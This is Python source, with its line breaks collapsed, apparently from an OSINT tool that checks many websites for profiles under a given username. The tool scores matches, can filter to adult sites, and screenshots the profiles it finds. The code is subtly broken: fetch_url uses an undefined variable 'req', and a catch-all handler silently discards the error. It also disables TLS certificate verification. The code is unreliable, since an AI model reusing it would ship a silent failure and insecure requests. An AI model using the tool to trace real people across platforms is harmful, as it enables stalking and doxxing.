def fetch_url(site, username, options): sleep(randint(1, 99) / 100) LOG.info("[Checking] "+ get_fld(site["url"])) source = "" detection_level = { "extreme": { "fast": "normal", "slow": "normal,advanced,ocr", "detections": "true", "count":1, "found":2 }, "high": { "fast": "normal", "slow": "normal,advanced,ocr", "detections": "true,false", "count":2, "found":1 }, "current":"high" } headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0", } try: response = get(site["url"].replace("{username}", username), timeout=5, headers=headers, verify=False) source = response.text response.close() text_only = "unavailable"; title = "unavailable"; temp_profile = {} temp_detected = {} detections_count = 0 def merge_dicts(temp_dict): result = {} for item in temp_dict: for key, value in item.items(): if key in result: result[key] += value else: result[key] = value return result def detect_logic(detections): detections_count = 0 temp_detected = [] temp_found = "false" temp_profile = { "found": 0, "image": "", "link": "", "rate": "", "status":"", "title": "unavailable", "language": "unavailable", "text": "unavailable", "type": "unavailable", "good":"", "method":"" } for detection in detections: temp_found = "false" if detection["type"] in detection_level[detection_level["current"]]["fast"] and source != "": detections_count += 1 if detection["string"].replace("{username}", username).lower() in source.lower(): temp_found = "true" if detection["return"] == temp_found: temp_profile["found"] += 1 return temp_profile, temp_detected, detections_count def detect(): temp_profile_all = [] temp_detected_all = [] detections_count_all = 0 for detection in site["detections"]: detections_ = [] if detection["type"] == "shared": detections_ = next(item for item in SHARED_DETECTIONS if item["name"] == detection['name']) if len(detections_) > 0: val1, val2, val3 = detect_logic(detections_["detections"]) temp_profile_all.append(val1) detections_count_all += val3 val1, val2, val3 = detect_logic(site["detections"]) temp_profile_all.append(val1) detections_count_all += val3 return merge_dicts(temp_profile_all), temp_detected_all, detections_count_all temp_profile, temp_detected, detections_count = detect() if temp_profile["found"] >= detection_level[detection_level["current"]]["found"] and detections_count >= detection_level[detection_level["current"]]["count"]: temp_profile["good"] = "true" with suppress(Exception): soup = BeautifulSoup(source, "html.parser") [tag.extract() for tag in soup(["head", "title","style", "script", "[document]"])] temp_profile["text"] = soup.getText() temp_profile["text"] = resub("\s\s+", " ", temp_profile["text"]) with suppress(Exception): temp_profile["language"] = get_language_by_parsing(source) if temp_profile["language"] == "unavailable": temp_profile["language"] = get_language_by_guessing(temp_profile["text"]) with suppress(Exception): temp_profile["title"] = BeautifulSoup(source, "html.parser").title.string temp_profile["title"] = resub("\s\s+", " ", temp_profile["title"]) temp_profile["text"] = temp_profile["text"].replace("\n", "").replace("\t", "").replace("\r", "").strip() temp_profile["title"] = temp_profile["title"].replace("\n", "").replace("\t", "").replace("\r", "").strip() if temp_profile["text"] == "": temp_profile["text"] = "unavailable" with suppress(Exception): if detections_count != 0: temp_value = round(((temp_profile["found"] / detections_count) * 100), 2) temp_profile["rate"] = "%" + str(temp_value) if temp_value >= 100.00: temp_profile["status"] = "good" elif temp_value >= 50.00 and temp_value < 100.00: temp_profile["status"] = "maybe" else: temp_profile["status"] = "bad" temp_profile["link"] = site["url"].replace("{username}", req["body"]["string"]); temp_profile["type"] = site["type"] if "FindUserProfilesFast" in options and "GetUserProfilesFast" not in options: temp_profile["method"] = "find" elif "GetUserProfilesFast" in options and "FindUserProfilesFast" not in options: temp_profile["method"] = "get" elif "FindUserProfilesFast" in options and "GetUserProfilesFast" in options: temp_profile["method"] = "all" copy_temp_profile = temp_profile.copy() return 1,site["url"], copy_temp_profile except Exception as e: pass return None,site["url"],[]
def check_user_cli(self, argv): ''' main cli logic ''' temp_detected = {"detected": [], "unknown": [], "failed": []} temp_options = "GetUserProfilesFast,FindUserProfilesFast" if argv.method != "": if argv.method == "find": temp_options = "FindUserProfilesFast" if argv.method == "get": temp_options = "GetUserProfilesFast" req = {"body": {"uuid": str(uuid4()), "string": argv.username, "options": temp_options}} self.setup_logger(uuid=req["body"]["uuid"], file=True, argv=argv) self.init_logic() if argv.cli: if not self.silent: self.log.info("[Warning] --cli is not needed and will be removed later on") for site in self.websites_entries: site["selected"] = "false" if argv.websites == "all": list_of_countries = [] if argv.countries != "all": list_of_countries = argv.countries.split(" ") for site in self.websites_entries: if site["country"] != "" and site["country"].lower() in list_of_countries: site["selected"] = "true" else: site["selected"] = "false" else: for site in self.websites_entries: site["selected"] = "true" if argv.type != "all": sites = ([d for d in self.websites_entries if d.get('selected') == "true"]) if "adult" in argv.type.lower(): for site in sites: if "adult" in site["type"].lower(): self.search_and_change(site, {"selected": "pendding"}) for site in self.websites_entries: if site["selected"] == "pendding": site["selected"] = "true" else: site["selected"] = "false" if int(argv.top) != 0: sites = ([d for d in self.websites_entries if d.get('selected') == "true"]) sites = ([d for d in sites if d.get('global_rank') != 0]) sites = sorted(sites, key=lambda x: x['global_rank']) for site in sites[:int(argv.top)]: self.search_and_change(site, {"selected": "pendding"}) for site in self.websites_entries: if site["selected"] == "pendding": site["selected"] = "true" else: site["selected"] = "false" else: for site in self.websites_entries: for temp in argv.websites.split(" "): if temp in site["url"]: site["selected"] = "true" true_websites = 0 for site in self.websites_entries: if site["selected"] == "true": true_websites += 1 if not self.silent: self.log.info("[Init] Selected websites: {}".format(true_websites)) resutls = self.find_username_normal(req) for item in resutls: if item is not None: if item["method"] == "all": if item["good"] == "true": item = self.delete_keys(item, ["method", "good"]) item = self.clean_up_item(item, argv.options) temp_detected["detected"].append(item) else: item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "extracted", "metadata"]) item = self.clean_up_item(item, argv.options) temp_detected["unknown"].append(item) elif item["method"] == "find": if item["good"] == "true": item = self.delete_keys(item, ["method", "good"]) item = self.clean_up_item(item, argv.options) temp_detected["detected"].append(item) elif item["method"] == "get": item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "extracted", "metadata"]) item = self.clean_up_item(item, argv.options) temp_detected["unknown"].append(item) else: item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "title", "language", "rate", "extracted", "metadata"]) item = self.clean_up_item(item, argv.options) temp_detected["failed"].append(item) with suppress(Exception): if len(temp_detected["detected"]) == 0: del temp_detected["detected"] else: if "all" in argv.profiles or "detected" in argv.profiles: if argv.filter == "all": pass else: temp_detected["detected"] = [item for item in temp_detected["detected"] if item['status'] in argv.filter] if len(temp_detected["detected"]) > 0: temp_detected["detected"] = sorted(temp_detected["detected"], key=lambda k: float(k['rate'].strip('%')), reverse=True) else: del temp_detected["detected"] else: del temp_detected["detected"] if len(temp_detected["unknown"]) == 0: del temp_detected["unknown"] else: if "all" in argv.profiles or "unknown" in argv.profiles: pass else: del temp_detected["unknown"] if len(temp_detected["failed"]) == 0: del temp_detected["failed"] else: if "all" in argv.profiles or "failed" in argv.profiles: pass else: del temp_detected["failed"] if argv.output == "pretty" or argv.output == "": if 'detected' in temp_detected: if not self.silent: self.log.info("[Detected] {} Profile[s]".format(len(temp_detected['detected']))) if 'unknown' in temp_detected: if not self.silent: self.log.info("[unknown] {} Profile[s]".format(len(temp_detected['unknown']))) if 'failed' in temp_detected: if not self.silent: self.log.info("[failed] {} Profile[s]".format(len(temp_detected['failed']))) if "detected" in temp_detected: if self.screenshots and self.screenshots_location: location = None with suppress(Exception): if not self.silent: self.log.info("[Info] Getting screenshots of {} profiles".format(len([item['link'] for item in temp_detected["detected"]]))) with suppress(Exception): g = Galeodes(browser="chrome", arguments=['--headless', self.headers['User-Agent']], options=None, implicit_wait=5, verbose=False) results = g.get_pages(urls=[item['link'] for item in temp_detected["detected"]], screenshots=True, number_of_workers=10, format='jpeg', base64=False) for item in results: if item['image'] is not None: with suppress(Exception): file_name = resub(r'[^\w\d-]', '_', item['url']) + '.jpeg' with open(path.join(self.screenshots_location, file_name), 'wb') as f: f.write(item['image']) location = self.screenshots_location if location: if not self.silent: self.log.info("[Info] Screenshots location {}".format(location)) if argv.output == "pretty" or argv.output == "": if 'detected' in temp_detected: if not self.silent: self.log.info({"custom": temp_detected['detected']}) if 'unknown' in temp_detected: if not self.silent: self.log.info({"custom": temp_detected['unknown']}) if 'failed' in temp_detected: if not self.silent: self.log.info({"custom": temp_detected['failed']}) if argv.output == "json": if not self.silent: self.log.info(dumps(temp_detected, sort_keys=True, indent=None)) return temp_detected
def cleanTags(string): htmlCleaned = Cleaner(allow_tags=[''], remove_unknown_tags=False, style=True ).clean_html(string or u"dummy") return resub(r"\s\s+" , " ", htmlCleaned)